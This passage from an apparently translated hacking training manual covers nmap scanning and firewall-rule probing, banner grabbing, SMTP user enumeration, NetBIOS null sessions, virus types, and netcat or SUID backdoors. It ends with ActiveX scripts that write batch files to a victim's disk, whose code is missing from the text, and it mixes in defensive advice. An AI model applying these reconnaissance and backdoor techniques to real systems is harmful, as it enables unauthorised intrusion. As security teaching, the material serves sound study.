Other options are used, in certain cases, in order to bypass some of the filtering rules •
The FIN scan: A FIN packet is sent to each port. If an RST is sent back, this means that the port is closed; if no answer is sent back, Nmap deduces that the port is open.
•
XMAS: Xmas sends FIN packets by activating URG and PSH flags.
•
The NULL scan: All flags are deactivated.
Several other nmap options can also be useful: -F
Only the standard ports specified in the service file are scanned instead of all 65,535
-P0
Nmap sends an ICMP echo type request before scanning in order to know if the destination machine is up. In some cases, the ICMP protocol is filtered, and the host will not be considered as reachable. This option can deactivate the use of this preliminary request in order to scan directly (without knowing if the host is reachable).
-sU
Can scan a UDP port.
-p
Can specify precise ports (p1, p2, p3...) or lists of ports (p1-p2) to scan instead of all existing 65,535.
-T
Can modify the time between two sent packets. The possible values are Paranoid | Sneaky | Polite | Normal | Aggressive | Insane
The Hackademy
DMP
-30/209-
SYSDREAM
It is also possible to specify several hosts to scan using the following notation in the target: 192.168.0-255.1-254 192.168.124.0/24 192.168.124.0
All machines from 192.168.0.1 to 192.168.255.254 All machines of the C class network designated by the network address All IPs from 192.168.124.1 to 192.168.124.255
Here are the results of a standard scan: nmap 192.168.124.20 Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-05-18 23:55 CEST Interesting ports on Dantes (192.168.124.20): (The 1648 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 443/tcp open https 864/tcp open unknown 875/tcp open unknown 899/tcp open unknown 1024/tcp open kdm 2049/tcp open nfs Nmap run completed -- 1 IP address (1 host up) scanned in 1.006 seconds
E) Listing of services
Once the list of open ports is established, the hacker will have to positively identify the services associated to each port, as well as their versions. Several techniques can be used: Banner Grab Telnet (Telecommunications Network) enables a client machine to be connected to a shell on a remote server. Telnet clients appear on virtually all platforms (Windows, Unix, MacOS, BeOS…). It allows a TCP connection on any port of a remote machine. Open telnet : 1. 2. 3. 4. 5.
Click on “Start”. Then on “Execute”. Type “telnet” and validate. Click on “Connection”, then on “Distant System”. In the window, indicate a host name or an IP address to connect to the remote system. Then, open a port number.
The Hackademy
DMP
-31/209-
SYSDREAM
By connecting yourself to the various server applications a system carries out, you can find out plenty of information about the system. The following appendix gives a short description of how you can gather information on these services: • FTP • SMTP • HTTP • SNMP • Telnet Systems or services are often self-presented through “banners”. The vast majority of systems do not have a proper configuration. After a quick look at the service's type and version, a hacker will be able to determine what the operating system is and in what way this version is vulnerable. The highlighting of the activity of certain ports can reveal information on the type of remote system such as ports 135 to 140 (Windows NetBIOS service), 111 (SunRPC on SUN stations)... FTP : Files Transfer Protocol FTP is a file exchange protocol between two systems. As for all services, an A machine must be equipped with an ftp client, and a B machine with an FTP server. Conventionally, the TCP protocol uses the TCP/21 port for commands, and the TCP/20 port for data. The TCP/21 port is called Protocol Interpreter or PI, and the TCP/20 port is called the Data Transfer Process or DTP. Connect yourself to the target FTP service, on port 21. See what information the banner gives you, if there is any. Note: An “Anonymous” session is one that is managed by the administrator and where anyone can benefit from the server's FTP service (to download files on the server, for example). The logins used in this type of authentication are ftp or anonymous, associated to any email address as a password. The configuration of some FTP services, which leave an access possibility to anonymous sessions, can be so disastrous that some websites allow access to the “passwd” file (“/etc/passwd” tree on a Linux system, this file contains all active logins on the machine), or the site's complete tree, or even lists with writing access (where anyone can generally send files). With Internet Explorer, the “browsing” of the lists shows lists typical of UNIX type systems. It has to be checked that this is really the case. Open an FTP session via telnet and connect yourself as Anonymous. You can connect yourself with telnet to an ftp server if you follow the format of this protocol: 1. USER Anonymous [to enter as Anonymous]. 2. PASS [email protected] [You will usually have to give your email address as password] After this, you will be advancing blindly, especially if you do not know the system. The commands that you can save are generally listed with the command help or ?.
The Hackademy
DMP
-32/209-
SYSDREAM
SMTP : Simple Mail Transfer Protocol The SMTP protocol can transfer emails. It is generally implemented on the TCP/25 port. As for all other services, an SMTP service can reveal information through its banner. The most interesting thing, however, is the non-necessary integration of two commands specific to the SMTP service: “vrfy” and “expn”. To check if they are accessible, click “help”. •
VRFY : the aim of this command is to check whether an email address exists at the requested server address. If you connect yourself to an SMTP service, and send the command “VRFY admin”, a positive answer will indicate that there is an “admin” login on the system.
•
EXPN : this command can check the existence of aliases within a system for any given account. An alias allows a natural person to have several email addresses and can be a good information source.
In the example below, the hacker has managed to obtain information on someone's identity and on aliases for “root” (most likely addresses related to other administrator systems).
The Hackademy
DMP
-33/209-
SYSDREAM
HTTP HTTP service is accessible via port 80. Several commands can obtain further information on the system. The procedure is to first send a valid command and then to press ENTER again to validate once more. Example : 1. 2. 3. 4.
Connect to www.microsoft.com (telnet www.microsoft.com 80). Enter the command : OPTIONS / HTTP/1.0 . Validate by pressing ENTER, then validate again. The information contained in P3P (“Platform for Privacy Preferences”) designates the information collected on the users. Please refer to http://www.w3.org/TR/P3P/ to know more about the P3P system.
The information gathered can specify the web server's version, the operating system, the various modules installed on it (php, cgi ...) as well as the various commands that can be sent to the server. Please note that you should normally be disconnected from the system after each command. The Hackademy
DMP
-34/209-
SYSDREAM
SNMP : Simple Network Management Protocol SNMP is a network equipment management protocol that allows the administrator to ask its equipment to gather information. In our example, we have found four equipments on our network which figured in the “public” community string, which means that anyone can have access to the information that the equipments send back.
On the Internet, you can http://www.solarwinds.net/
find
the
tools
that
can
make
these
requests
automatic.
Note: the “public” community string is generally the value given by default to a machine running an SNMP agent. It is up to the administrator to modify its configuration. The opposite of a public string is a “private” string. This one does not authorise the delivering of any information to the general public. TELNET This service, which enables a remote access to a shell on the system, is generally restricted by a compulsory identification with login and password. The banner on the system can however be useful. Use telnet to connect yourself. By default, you are connected to port 23, so it is not necessary to specify any port.
The Hackademy
DMP
-35/209-
SYSDREAM
F) Netbios Listing On many Windows machines, either for the needs of the user or by default, the file-sharing services with the NetBIOS protocol are very often activated. If the remote machine is badly configurated, this protocol can gather information on the system: name of the machine, its domain, its current shares, etc. Several fingerprintings are possible. NetBIOS Shares Thanks to the NetShareEnum call, it is possible to list the current shares on a machine. On some systems, entire hard drives are shared without their users realising it. NULL Session Method
Null sessions are used when a machine wants to have access to the information of another machine without belonging to its domain or its working group. In the register base of the target machine, the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] containing the “restrictanonymous” value determines or does not determine the possibility to establish anonymous sessions. To restrict access, all that has to be done is to specify a value of 2: "restrictanonymous"=dword:00000002. Winfingerprint (http://winfingerprint.sourceforge.net) is a Windows machines' fingerprinting tool carrying out NetBIOS resolution methods on top of alternative methods.
The Hackademy
DMP
-36/209-
SYSDREAM
Here is a scan report obtained with the help of Winfingerprint on a share: Host Information: 139 tcp Open Domain: MSHOME NetBIOS ABAMA MAC Address: 0007cb0000ff Domain: MSHOME NetBIOS ABAMA MAC Address: 0007cb0000ff Fingerprint: Role: NT Workstation Role: LAN Manager Workstation Role: LAN Manager Server Role: Server sharing print queue Role: Potential Browser Role: Master Browser Version: 5.1 Comment: room computer NetBIOS Shares: (...) Name: \\82.X.X.X\Printer Remark: Canon Bubble-Jet BJC-3000 Type: Interprocess communication (IPC) Name: \\82.X.X.X\D Remark: Accessible without password. Name: \\82.X.X.X\C Remark: Accessible without password.
The Hackademy
DMP
-37/209-
SYSDREAM
G) Applicative Fingerprinting Even if it is possible to de-activate some services' banners, each service implementation has its own characteristics (error codes ...). By comparing the answers received to a database of standard service digital signatures, it is possible to determine the version. This technique can be used with the -A option of nmap (only on Linux): Laptop:/home/xdream# nmap -A 192.168.124.20 Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-05-19 00:14 CEST Interesting ports on Dantes (192.168.124.20): (The 1648 ports scanned but not shown below are in state: closed) PORT STATE SERVICE VERSION 21/tcp open ftp vsFTPd 1.2.1 22/tcp open ssh OpenSSH 3.4p1 (protocol 2.0) 80/tcp open http Apache httpd 1.3.29 ((Debian GNU/Linux)) 111/tcp open rpcbind 2 (rpc #100000) 139/tcp open netbios-ssn Samba smbd (workgroup: DgSWORKGROUP) 443/tcp open ssl/http Apache httpd 1.3.29 (Ben-SSL/1.53 (Debian GNU/Linux) PHP/4.3.4) 864/tcp open ypserv 1-2 (rpc #100004) 875/tcp open ypbind 1-2 (rpc #100007) 899/tcp open mountd 1-2 (rpc #100005) 1024/tcp open status 1 (rpc #100024) 2049/tcp open nfs 2 (rpc #100003)
H) Listing of firewalling rules Errors in implemented filtering rules can result in an intruder establishing contact in a trivial way with Internet systems. Filtering by trust relation: The majority of filtering rules are implemented according to authorisations given to certain specific machines. You can try to determine the trusted IP addresses, if these do exist, by using idle host scanning techniques we will study later on in this training course.
Filtering by protocol: Some protocols are not forbidden, such as ICMP, UDP ... They can represent a danger because they can encapsulate communications with backdoors installed by the hacker. These techniques are designated by the term covert channel. You can determine which protocols are authorised thanks to nmap's -sO option:
The Hackademy
DMP
-38/209-
SYSDREAM
# nmap 3.50 scan initiated Wed May 192.168.124.20 Interesting protocols on domain.com): PROTOCOL STATE SERVICE 0 open hopopt 1 open icmp 2 open igmp 3 open ggp 4 open ip 5 open st 6 open tcp 7 open cbt 8 open egp 9 open igp 10 open bbn-rcc-mon 11 open nvp-ii 12 open pup 13 open argus 14 open emcon 15 open xnet 16 open chaos 17 open udp 18 open mux 19 open dcn-meas 20 open hmp 21 open prm 22 open xns-idp ...
5 09:53:23 2004 as: nmap -sO
-v
Filtering by source port Frequently, filtering rules associated to port sources are found in order to let internal machines establish a communication on the Internet. For example, to let users surf on the web, answers coming from port 80 must be accepted. That is also the case for entering DNS answers. So the ports often authorised in source are 25/tcp, 53/udp, 80/tcp, 110/tcp. So it is then possible for a hacker to ignore the access restrictions by establishing connections from the authorised source ports. You can use the -g option associated to a source port and to a protocol (tcp in standard, -sU for udp) in order to determine the firewalling rules according to source ports.
The Hackademy
DMP
-39/209-
SYSDREAM
Here is a sum up of all the functions that can be given to nmap: -sS -sT -sF, -sX, -sN -sP -sU -sO -sA -sW -sR -P0 -O -A -v -oN file -p port -F -g port
Syn scanning Connect() Method Finscan, Xmas scan, NULL scan... ping scanning Scanning in UDP mode Scanning of authorised protocols ACK scan Window scanning RPC scan De-activate the ping before the port scan Active fingerprinting Appliance fingerprinting Verbose mode Write the output in its specific file. Specification of particular ports or of port range to scan Scan of ports listed in the services file Use the specifier port as communication source port.
Security Most of the information gathered being either public or linked to the functioning of infrastructure or to accessible services, it is essential to establish a real security management policy concerning broadcast or accessible information.
Give as little information as possible concerning your IT infrastructure, and check that no sensitive information can be accessible via web-type access (especially in source codes...) Each user must also be careful about any information he or she could leak, especially on forums, in newsgroups or interviews.
De-activate services that are not useful, as each service represents an extra danger.
Correctly implement your firewalling rules, so that internal services, especially of the filesharing type, are not accessible from the Internet.
Filter the ICMP protocol, as it can give precious technical information to a possible intruder.
Modify the banners of all services, by replacing them with banners of other equivalent services in order to fake the hacker's results.
As much as possible, make sure you do not allow free access to Netbios file-sharing services from the Internet.
The Hackademy
DMP
-40/209-
SYSDREAM
CHAPTER II CLIENT VULNERABILITIES
The Hackademy
DMP
-41/209-
SYSDREAM
1. Virus attack Even with a massive anti-virus protection, no one is ever immune to an attack from a recent or non referenced virus. The best course of action is to be wary of the following symptoms. These are not necessarily caused by a virus but that is frequently the case. A deeper examination will then be necessary, and it is recommended you go to the next chapter, which concerns viruses: 1. The antivirus protection of BIOS informs you of an access to the boot zone of the hard drive. 2. When you start your computer, a message tells you it cannot start from the hard drive. 3. Windows refuses to load the 32-bit hard drive pilots. 4. When Windows is started, a message informs you that a TSR program is forcing to start in MS-DOS compatible mode. 5. ScanDisk detects crossed-link files or other problems. 6. ScanDisk indicates defective sectors on the hard drives or floppy disks. 7. The size of executable files suddenly increases. 8. The creation or modification date of files has errors. 9. You notice the computer frequently stalls even though you have added no new software or material component. 10. The computer stalls and indicates a parity error. 11. The computer seems to be slower for no apparent reason. 12. The keyboard and mouse are no longer reliable, even after having being cleaned. 13. Files disappear from your computer in an unexplained manner. 14. In your documents, some words disappear while others are suddenly added. Let us now see the action modes of the most dangerous viruses according to their type. You will recognise some of the names used (polymorphic viruses, macro-viruses ...) and you will also realise there are many more. The following paragraphs lists all types of viruses. Boot sector viruses: These viruses settle in the boot sector of boot floppy disks and hard drives. Only a few years ago, these were the most common variety. Back then, they would spread rapidly because users often exchanged data with floppy disks. Now that the size of applications and of files has considerably increased, mediums such as CD-ROMs are much more widely used. Meanwhile, other contamination means such as the Internet have been developed, and at the same time boot sector viruses have lost ground. All danger has not disappeared, however. Viruses of this type almost exclusively use floppy disks as a dissemination medium: all that has to be done is to insert a boot floppy disk into an infected PC drive to contaminate it, the disk then transmits the virus to each computer using it to boot. When you forget such a medium in the drive, the computer uses it to boot the following time instead of favouring the hard drive. The virus is then immediately transmitted to the disk. They cannot be disseminated on networks. Boot sector viruses are resident parasites, meaning that they settle in live memory at the start and wait for an opportunity to spread. Partition sector viruses: Partition sector viruses are a development of boot sector viruses. They can bypass an obstacle that the latter encounter: the structure of the boot sector depends on the operating system. There are differences between the various versions of DOS and Windows. A boot sector virus that wants to disseminate widely must distinguish structures and adapt to them. The resulting code is important as the size of the boot sector only offers limited space. Partition sector viruses do not have to deal with this problem as the structure of the sector they settle into does not depend on the operating system. The infection is disseminated almost exclusively through floppy disks. So the previous remarks concerning boot sector viruses also apply here: a disk forgotten in the drive is often the cause of the infection. Partition sector viruses, like boot sector ones, are resident parasites, meaning that they settle in live memory during booting and wait for an opportunity to spread. The Hackademy
DMP
-42/209-
SYSDREAM
File viruses: These viruses attack .com and .exe executable files, and more rarely .dll and .ovl files. A programme virus attaches itself to a program file (the host) and uses various techniques to infect other programme files. There are three basic techniques to infect an executable file: replacement, adding at the start and adding a return. ➢
A virus based on replacement places itself at the start of the program, right at the start of the original program code, thus damaging the program. When you try to start it, nothing happens, however the virus infects another file. Such viruses are easily detected by users and by technical staff, therefore they do not disseminate widely. There is very little risk a virus of this type might find its way to your machine.
➢
A virus based on adding at the start puts its entire code at the very beginning of the original program. When you start a program infected with this type of virus, this code is started first and the original program is started but the size of the infected file will of course increase.
➢
A virus based on adding a return places a “return” at the start of the program code, then places the start of the program code at the end of the file and then places itself between what was the end of the file and the start of the file. When you try to start the program, the “return” calls the virus, which then starts. It replaces the original start of the file in its normal position and enables you to start the program. An increase of the size of the file is however noticeable.
We have just seen briefly how a virus attaches itself to a program file. It uses various infection techniques. Most viruses are resident ones, meaning that they can control all actions and infect other programs. Other file viruses infect by “direct action”, which means that they infect a program when they have access to it. There are many other methods, but in most cases, these place the viruses in memory. If the virus is a resident one, it is then extremely easy for it to infect other programs, simply by waiting for these to be started to enter them. This file is then infected (it becomes a “carrier”) and goes on to infect other programs. Once activated, they can contaminate other executables and spread. Like executable files in your hard drive, these viruses can be found on floppy disks, CD-ROM, attached to email, or in files transferred while downloading. These are all possible means of infection. Unlike boot or partition sector viruses, this type of virus is not systematically activated each time the computer is turned on. They settle in live memory only when the user opens an infected file. However, they are disseminated even if they are not active, as all it takes is a contaminated program to be transmitted by email or any other medium. If the destination uses the software without submitting it beforehand to an antivirus, his PC is then contaminated. What's more, they can infect networks. File viruses: File viruses are thankfully very rare. This is a good thing as they are hard to eliminate. They make use of use the mediums' management mode. They use a file which receives the physical address of the first allocation unit of all the medium's files. When the user opens a file, the computer looks for the corresponding address in this file. File viruses replace this address with their own one and keep their directory updated. When a file manipulated in this way is called, the virus starts by activating itself. It then uses its list to call the requested file and thus hide its presence.
The Hackademy
DMP
-43/209-
SYSDREAM
Companions: Companions are a group of viruses of no great importance. They were widespread in the days of MS-DOS. Because Windows is a favourable ground for them, but they have become rarer. The functioning of companions is based on a specificity of the DOS operating system: when an executable file is called, it is not necessary to give the extension (.exe, .com, .bat); the name of the file is enough. DOS first looks through .com files, then .exe files and finally .bat files. The virus takes advantage of this characteristic by creating a .com file with the name of the .exe file and integrating its code. Programmers of these viruses wish to infect as many files as possible so that their companions be rapidly activated. Direct Action: The viruses presented up to now have the common characteristic of functioning as residents: when they are activated (by accessing a medium or by opening an infected programme), they settle in live memory. They are therefore active until the PC is turned off and infect as many programs and mediums as possible. Thankfully, their activity is quickly noticeable. Simply by checking the contents of the live memory, one can notice the presence of suspicious software. Direct Action type viruses are quite another type altogether: they try to infect the maximum number of files in a relatively short amount of time so as to go unnoticed, they then interrupt their action without leaving any trace in live memory. Direct Action type parasites are file viruses, meaning that they are linked to executables. Their means of infection are floppy disks and CD-ROMs, email, file transfer and downloading from the Internet. Of course, the copy of the file on your hard drive does not activate the virus. They spring to action only when the programme is executed. Stealth Viruses: Stealth viruses are not a specific category of parasites. They are called stealth viruses because they can foil the action of antivirus software. Any type of virus can be a stealth one, however the camouflage technique is reserved to resident viruses and so does not concern Direct Action viruses, for example. Stealth viruses integrate the functions of an operating system used to look out for viruses. They can thus immediately detect any antivirus activity and react consequently. They can for example provide false information or withdraw from the examined zone in time to avoid being found out. Example: While a boot sector virus watches the systems access to functions devoted to protection, an application tries to call them. The virus then takes over and provides a copy of the original start zone. The protection software reads this copy and decides it is correct and without any virus. Multi-part viruses: These viruses infect executable files and start sectors. They can be disseminated on networks. Polymorphic viruses: Coding is another protection used by various types of viruses. A parasite is characterised by its binary code, a succession of bytes that is unique to it and that no other program has. This succession of bytes is called a signature and enables the antivirus to find the virus: the detector looks for signatures in all programs of the hard drive, when one is found in a file, it deduces that the corresponding virus has already struck. Polymorphic viruses try to avoid this trap by modifying their own code with each new infection, more specifically by changing the succession of bytes, so that the antivirus software cannot recognise them. Antiviruses have adapted to this: they are often able to detect polymorphic viruses. That's why it is extremely important to use recent antivirus programmes. Tunnel viruses and retroviruses: Some viruses do not simply remain passive in front of antiviruses: like other viruses, they implement camouflage or coding techniques, but they also act against detectors or try to divert their supervision. Some programmers have closely examined the way antivirus software functions and have developed Tunnel viruses as an answer. These parasites especially try to neutralize resident virus detectors by diverting their supervision. They look for other functions and means to avoid coming across supervisors. The amount of time they are active is limited because antiviruses are constantly adapting to their tricks and have fewer and fewer weak points. The Hackademy
DMP
-44/209-
SYSDREAM
Retroviruses are a bit more aggressive. Other programmers have also closely examined antivirus software. The viruses they have created destroy or damage important antivirus files. The supervision programs within the memory are “shot down”. Modifications carried out in the configuration files prevent them from starting during a later opening. Retroviruses are remarkably efficient. Many antiviruses are insufficiently protected. Macroviruses: Macroviruses are a new type of virus and first appeared in 1995. Unlike other nuisances, they are not made up of a binary code but of macro-language instructions such as Microsoft Office's VBA or Lotus Smart Suite scripts. These languages are destined to people with limited IT knowledge, hence the flood of macroviruses. As the infection mode is different, users did not immediately realise the extent of the danger. Viruses took advantage of this to develop at an impressive speed. Thankfully, editors of antivirus software took care of the matter, however macroviruses remain a real danger.
Ever since the first macrovirus was introduced in August 1995, this category is the one that has developed the fastest. By August 1998, 3400 viruses of this type had been identified, and their number is soaring at a dizzying speed. Companies and individuals have to protect themselves by frequently updating their virus control tools, which means that the antivirus programming industry must constantly update its bases and files. A definition file contains virus signatures (the fingerprint of known viruses); it is used by the search engine to detect and eliminate viruses. A virus scan is efficient only with a signature file of recent viruses. Because of this, recovering frequent updates is essential to ensure the proper security of your IT environment... The differences between macroviruses and more traditional viruses lie in the hosts (data files) and the duplication methods (use of macro programming language specific to applications). These differences are a new threat to the security of data. Add to this the increasing use of OLE (Object Linking and Embedding), as well as the use of networks, email and the Internet as exchange mediums, and the sinister picture is complete! Traditional files viruses do not attempt to infect data files, as these are not ideal for dissemination. In fact, one does not “open” a data file, but one “reads” or “modifies” it. However, these past few years, companies have built open systems in which information is more easily exchanged. Security must therefore be at a minimum. Macroviruses take advantage of the fact that many applications now have a macro programming language. These languages allow users (and virus creators) greater flexibility and a strength unmatched to this day. Often, macroviruses are not detected early enough because users are not familiar with macros. The result is a higher rate of infection than with traditional file and boot viruses. The programming language that is currently the most popular is WordBasic, integrated into Microsoft Word. As data is exchanged more often than the programmes themselves, the security problem created by microviruses is a very real one. Open systems integrated into many application use OLE to combine different types of data. You can include an object such as a picture into a Word document. This means that each modification of the object will be reflected in all its copies. You can also link an object such as an Excel calculation sheet into a Word document. This link means that you can modify the object either in the application that was used to create it or in the application to which it is linked, and all its copies will be updated.
The Hackademy
DMP
-45/209-
SYSDREAM
Microsoft Word can integrate and link objects. What's more, Word documents can be integrated and linked to other applications. The risk lies in the possibility of sending a macro virus from another application. For example, MSMail Microsoft messages can contain attached files such as Word documents. If the association is correct, all the MSMail user has to do is to double-click on the Word document, Word starts and the document is open. This is an example of OLE in action. There are other ways of using OLE with Word documents, and it is the frequency of usage which increases the security risks posed by viruses for Word macro. Some macroviruses include the destructive code; they can even create and execute traditional boot sector and file viruses and have consequences on the functioning of a machine, for example on the quality and reliability of information in a data file. It only took a short time after the first Word macrovirus appeared for its Excel equivalent to appear: XM/Laroux.A. This event was expected, as the creation techniques were the same as for programming a macrovirus for Word. The difference between the viruses for Word and Excel lies in the fact that viruses for Word are written in WordBasic, whereas those for Excel are written in VBA3 (Visual Basic for Applications version 3). The format is different and the macros are not stocked inside the calculation sheet (Word viruses are stored in the Word document), but in separate channels. This technique complicates detection, identification and eradication. Macroviruses in Excel represent a tougher problem than for those in Word, because of the practical consequences. Let us imagine that an Excel virus multiply the content of a cell by 10 and that this cell represents your salary! This would certainly not be the end of the world... However, what if the content of the cell were divided by 10? These are minor inconvenients compared to the modifications done to the result of a cell whose aim is to calculate the strength of the concrete used to build a high-rise building. The calculation sheets can be huge and any anomaly hard to detect. The introduction of Office 97 generated the modification of almost all following programmes, and changes were widespread. Excel and Word use VBA5, which is based on VBA3 with numerous extensions. VBA5 is not compatible with WordBasic, which seems to indicate that macroviruses written for previous versions of Word would not have consequences on Word 8.0 in Office 97. However, Microsoft has integrated a WordBasic to VBA5 and a conversion from VBA3 to VBA5 to update existing macros in the new formats. Consequently, macroviruses written for previous versions of Word and Excel can also be “updated” All viruses will not function after their conversion, but we do know that some of them will. It would be expected that microviruses still pose a serious threat to data security, even if it is thought that their number will increase less rapidly. It is also thought that viruses will take advantage of the most common macro programming languages and that they will become independent of applications. (Do not forget that Microsoft Word is currently the most affected application by macroviruses, most of these being written in WordBasic). Furthermore, it is thought that viruses will become polymorphic and stealth-like. Companies developing antiviruses will therefore keep fighting against macroviruses, as well as against 'traditional' file and boot sector viruses by detecting and eradicating macroviruses at the level of the application and at the binary level. ANSI Viruses: Many PCs install at the start a keyboard pilot called Ansi.sys. This pilot can change the configuration of the keyboard, to affect a character, or combinations of characters to a key, according to the user's language. Unfortunately, software with suspicious aims take advantage of this possibility. They thus affect to any key the expression del ** Enter, so that the user erases the total contents of a file by pressing this key in DOS (this is an example). Viruses but also more traditional programs are capable of this. As PCs on Windows 9x no longer need the pilot in question, the danger is avoided. The Hackademy
DMP
-46/209-
SYSDREAM
However, do check in the start files of the computer what the situation is and cancel the call to this pilot if it does exist. Logical bombs: Some programs that do not have the ability to reproduce can still cause serious damage. Software officially presented as a game can include a destructive function triggered during a precise event or at a pre-determined date. Sometimes, it is only an innocent prank. However, some programmers are real sadists, even if this is rare. Trojan horses: Trojan horses are an under-category of logical bombs. They do not have an immediate destructive aim: their task is limited to espionage. They gather confidential information on the user of the PC into which they have entered and transmit these to their creator. Some horses' mission is to establish an access (for example through a network) to the infected computer. The Internet being more and more used in commercial transactions, many new Trojan horses have been circulated.
2. Trojans There are different sorts of hidden gateways. The best well-known remains the trojan. A trojan is software executed without the user's knowledge. It will start to listen to a port on the system and wait for adapted clients. Quite often a trojan kit is made up of a client software, which is normally harmless for the user, and an executable server. Many trojans are available on the Internet. As they are for the majority referenced by antiviruses and conceived for Windows, a hacker attacking a Linux machine or wishing to use more discreet software will have to find alternative solutions. Netbus control window
The Hackademy
DMP
-47/209-
SYSDREAM
Netcat Netcat (http://www.atstake.com/research/tools/network_utilities) is a software that is used to carry out a diagnosis on the network. Netcat is a very popular tool in the Unix world: it can rapidly open TCP/UDP connections as well as start listening to ports. Netcat is available for both Linux and Windows, and it is not a hacking tool. However it integrates a very useful function for users who are aware of it: it is a function that can redirect the trafic received by a port to a local application. So by having Netcat listen to a port, any command received can be redirected towards /bin/bash or cmd.exe. As Netcat is not a hacking tool, it is not detected by antiviruses. A hacker with a minimum of progrramming skills will have no trouble developing, in a very short time, software that offers the same redirection functions as Netcat.
Also concerning Linux systems, it should be noted that it is trivial to create a small programme that would offer boundless administrator privileges, in case a hacker acquires them one single time... Once in possession of total power, the hacker would hide the programme with the SUID-bit thus sharing root privileges with anyone later executing the software.
The Hackademy
DMP
-48/209-
SYSDREAM
Creating a hidden gateway :
But the ultimate technique is to infect existing binaries on the hard drive, or even in memory. On Windows, an antivirus such as Norton AntiVirus (http://www.symantec.com) does not notice the infection mechanisms if the malicious program's code is not recognized in its signature base. Likewise, if for example Internet Explorer is infected and re-programmed to connect to a remote system, there is no chance your firewall will warn you. Indeed, Internet Explorer is an application that is very often authorized by firewall users. With the necessary rights, a skillful hacker will also be able to place a backdoor at the level of the system's core, and more generally on the system as a whole. This is called a rootkit. This method is currently more advanced on Linux, even if is also found on Windows. At this stage of a takeover, you can no longer truthfully believe any active security software on the system. Not one. How can a hacker install a backdoor ? If the target machine is a server station, the hacker will probably be able to have access to the system's resources through accesses that are not well protected: vulnerable server applications, compromised passwords... You will at that moment not be able to prevent him from executing code, at least as far as his execution rights are concerned. If the machine is a work station, the hacker can include the user as a vulnerability factor. All he has to do is to visit a malicious web page while the navigator shows great tolerance in the execution of scripts, or while a vulnerable version of Outlook is used. He can also try to have the program executed The Hackademy
DMP
-49/209-
SYSDREAM
through manipulation, incitement or deception (a fake email from a colleague, for example). Detection Methods Against the most common basic trojans, an antivirus should spare you a few headaches. As we have seen, however, most antiviruses cannot contain more elaborate strategies, especially if the hacker has a « legitimate » software listen to a port (any port). Most firewalls will be able reduce the improper use of outside connections or the establishment of server applications. But once again, this is not enough, and it is necessary to regularly check the process activity on the system. As a user, you should normally be able to justify the presence of any visible application in your “Task Administrator” in Windows, or by having an entry in /proc in Linux (reading with ps or top). Some more performing analysis tools, such as those presented in the monitoring section for Windows, can be of precious help during the detection phase. Otherwise, the netstat tool, on Linux and Windows, can indicate the state of active or listening sockets. A hacker with a network connection could not hide from this tool without having first obtained administrator privileges.
Against hacker software that is not listed, there remains the heuristic analysis. This consists in analysing the program's code in its execution procedures in order to find any flaws that could be there. Antiviruses such as AVP (http://www.kaspersky.com) or AVG (http://www.grisoft.com) are effective, but not infallible. Also, they are sometimes activated on false positives. Some rootkits, especially on Linux, find their specific anti-rootkits. CHKRootkit (http://www.chkrootkit.org) can thus detect about fifty popular rootkits. Generally speaking, your best ally against file infection remains the file integrity controller. Properly used, the security offered is The Hackademy
DMP
-50/209-
SYSDREAM
infallible. It consists in associating with each of the system's sensitive files a digital signature of the MD5 or SHA-1 type. MD5 and SHA-1 are algorithms that can detect, for a given byte combination, a signature of 16 or 20 bytes. If only one byte is modified in a file, the whole signature is changed! As of today, there are no officially known « collisions » on these bytes, meaning different byte combinations producing the same signature. Once a list of signatures produced on a system is recognised as clean, it can be saved on an outside medium (for example a CD-ROM). In case of doubt, a simple check with the help of the CD will enable you to precisely replace the corrupt applications. For Linux, the dedicated solution is called TripWire (http://www.tripwire.org).
3. ActiveX A) VBScript The aim of this part of the course is to show you how a hacker could use malicious scripts through Internet Explorer. In our first example, we are going to create a HTML page whose aim will be to create a batch file on the computer of a victim. A batch file is a succession of MS-DOS commands executed one after the other. Here is the basic structure of a HTML file you will have to type in (without the comments) to create a white page called “My Internet page”. M Internet page
Between “” tags are the comments that do not appear on your navigator but only in the page source. On the Internet, one can find many scripts that take advantage of various weak points to read, write and modify files on a client disk. These scripts are often called ActiveX. ActiveX were developed by Microsoft to increase the interaction between a website and a client's navigator. ActiveX are coded in VBScript. The ActiveX below enables the writing of a batch file on the victim's disk. It has to be included in a HTML page between the and tags.
The Hackademy
DMP
-51/209-
SYSDREAM
It will create a batch file at the root of C: called “newfile bat”. This batch file will include one MS-DOS command line (“echo CrashFr”). To add extra commands, all that has to be done is to add a “BatFile.WriteLine” line followed by the MS-DOS command. Here are several ActiveX that the hacker could combine with the above example: Writing a key in the register base Erasing a key in the register base Creating a URL shortcut in the start menu To correctly create your .bat file, you need to know the main DOS commands:
DOS commands cd ..
returns to the root file
cd [index]
go to a sub-file
choice
the user must choose
cls
erases what is on the screen
copy [file] [directory]
copies a file into a brief
del [file]
erases a file
dir /p
displays the contents of a file in several times
dir
displays the contents of a file
@echo off [command]
does not display following commands
echo.
jumps a line
echo [text]
displays the following text
edit [file]
displays the text file and can edit it
erase [file path]
erases a file (no authorisation asked)
format [drive]
formats a disk (victim authorisation asked)
goto
plugging request (jump)
The Hackademy
DMP
-52/209-
SYSDREAM
DOS commands if
conditional plugging
mem
displays disk space
mkdir [directory]
creates a file
pause
for the programme to continue, press any key
ren [file1] .[new extension]
replaces the extension of file 1 with the new extension
rename [file1] [new name]
renames file 1 with a new name
rmdir [directory]
erases a file
type [text file]
displays the contents of a txt file
ver
displays the DOS version
vol [drive]
displays the name of a reader
c:\windows\*.*
gives the whole contents of a file (authorisation asked)
c:\windows\*.[extension]
gives all files of a certain type from the brief (no authorisation asked)
For further help on the MS-DOS commands, all that has to be done is to open a command invite and to enter the command wanted followed by “/?”. c:\windows\command>ping /? Here is an example of a HTML page combining various examples seen above: : The Hackademy
DMP
-53/209-
SYSDREAM
If this HTML page is opened remotely with IE parameters by default, it does not authorise the execution of ActiveX. However, if this page is opened locally, IE will display a warning very far from the reality that the script will have on your system:
